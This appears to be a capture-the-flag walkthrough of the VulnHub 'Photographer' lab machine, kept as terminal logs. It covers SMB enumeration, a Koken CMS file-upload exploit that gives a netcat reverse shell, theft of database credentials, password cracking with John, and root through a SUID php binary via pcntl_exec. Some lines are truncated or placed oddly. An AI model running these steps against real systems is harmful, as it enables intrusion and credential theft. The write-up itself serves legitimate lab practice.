
Photographer

22 June 2022 08:33 PM

(kali㉿kali)-[~]
$ searchsploit Koken 0.22.24
 Exploit Title                                              |  Path
 Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)  |  php/webapps/48706.txt

kali@kali:~$ smbmap -H 192.168.43.174
[+] Guest session       IP: 192.168.43.174:445  Name: 192.168.43.174
        Disk            Permissions     Comment
        ----            -----------     -------
        print$          NO ACCESS       Printer Drivers
        sambashare      READ ONLY       Samba on Ubuntu
        IPC$            NO ACCESS       IPC Service (photographer se

kali@kali:~$ smbclient
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                     D         0  Tue Jul 21 2020
  ..                    D         0  Mon Jul 20 2020
  mailsent.txt          N       503  Mon Jul 20 21:29:40 2020
  wordpress.bkp.zip     N  13930308  Mon Jul 20 21:22:23 2020

        278627392 blocks of size 1024. 264268400 blocks available
smb: \> more mailsent.txt
getting file \mailsent.txt of size 503 as /tmp/smbmore.TagfyE (81.9 KiloBytes/sec)

Message-ID:
Date: Mon, 20 Jul 2020 -0400
From: Agi Clarence
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl
(END)

for confirmation

Screenshot: Koken admin library at 192.168.43.174:8000/admin/#/library/content (View site, logged in as daisa ahomi)

Screenshot: Koken admin, Site settings page at 192.168.43.174:8000

rename the file name

https://www.exploit-db.com/exploits/48706, then forward

kali@kali:~/vulnhub/photogra/wordpress/wp-includes$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.43.208] from (UNKNOWN) [192.168.43.174] 4
Linux photographer 4.15.0-107-generic #108~16.04.1-Ubuntu SMP
 12:52:14 up 41 min,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
/bin/sh: 0: can't access tty; job control turned off
$ id

user_password_here

www-data@photographer:/home$ cat /var/www/html/koken/storage/configuration/datab
<?php return array(
    'hostname' => 'localhost',
    'database' => 'koken',
    'username' => 'kokenuser',
    'password' => 'user_password_here',
    'prefix'   => 'koken_',
    'socket'   => ''
);

www-data@photographer:/home$ mysql -u kokenuser -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 256
Server version: 10.0.38-MariaDB-0ubuntu0.16.04.1 Ubuntu 16.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| koken              |
+--------------------+
2 rows in set (0.03 sec)

MariaDB [(none)]> use koken
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [koken]> show tables;
Tables_in_koken:
  koken_albums
  koken_applications
  koken_categories
  koken_content
  koken_drafts
  koken_history
  koken_join_albums_content
  koken_join_albums_covers
  koken_join_albums_text
  koken_join_categories_content
  koken_join_categories_text
  koken_join_content_tags
  koken_plugins
  koken_settings
  koken_slugs
  koken_tags
  koken_text
  koken_trash
  koken_urls
  koken_users

select * from users;

(kali㉿kali)-[~/Desktop/ctf/vulnhub/photogra]
$ sudo john --wordlist=/usr/share/wordlists/l
[sudo] password for kali:
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64])
Cost 1 (iteration count) is 256 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
babygirl
1g DONE (2022-06-22 13:19) 4.761g/s
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Nothing interesting found; same password, babygirl.

Screenshot: SUID binaries on the target (recoverable entries only)
  root  messagebus   42K  Jun 11 2020  /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  root  root         10K  Mar 27 2017  /usr/lib/eject/dmcrypt-get-device
  root  root         11K  Oct 25 2018  /usr/lib/xorg/Xorg.wrap
  root  root        109K  Jul 10 2020  /usr/lib/snapd/snap-confine
  root  root        419K  Mar  4 2019  /usr/lib/openssh/ssh-keysign
  root  root         19K  Mar 18 2017  /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
  root  root         15K  Mar 27 2019  /usr/lib/policykit-1/polkit-agent-helper-1
  root  dip         386K  Feb 11 2020  /usr/sbin/pppd
  root  root         23K  Mar 27 2019  /usr/bin/pkexec
  root  root         53K  May 16 2017  /usr/bin/passwd
  root  root         39K  May 16 2017  /usr/bin/newgrp
  root  root         74K  May 16 2017  /usr/bin/gpasswd
  root  root        4.7M  Jul  9 2020  /usr/bin/php7.2
  root  root        134K  Jan 31 2020  /usr/bin/(unreadable)
  root  root         40K  May 16 2017  /usr/bin/chsh
  root  root         49K  May 16 2017  /usr/bin/chfn
  root  root         44K  May  7 2014  /bin/ping
  root  root         31K  Jul 12 2016  /bin/fusermount
  root  root         40K  May 16 2018  /bin/(unreadable)
  root  root         44K  May  7 2014  /bin/ping6
  root  root         27K  May 16 2018  /bin/(unreadable)

www-data@photographer:/tmp$ php7.2 -r "pcntl_exec('/bin/sh', …);"
# id
# whoami
root
# cd /root
# cat proof.txt
[ASCII art banner and flag, unreadable in the screenshot]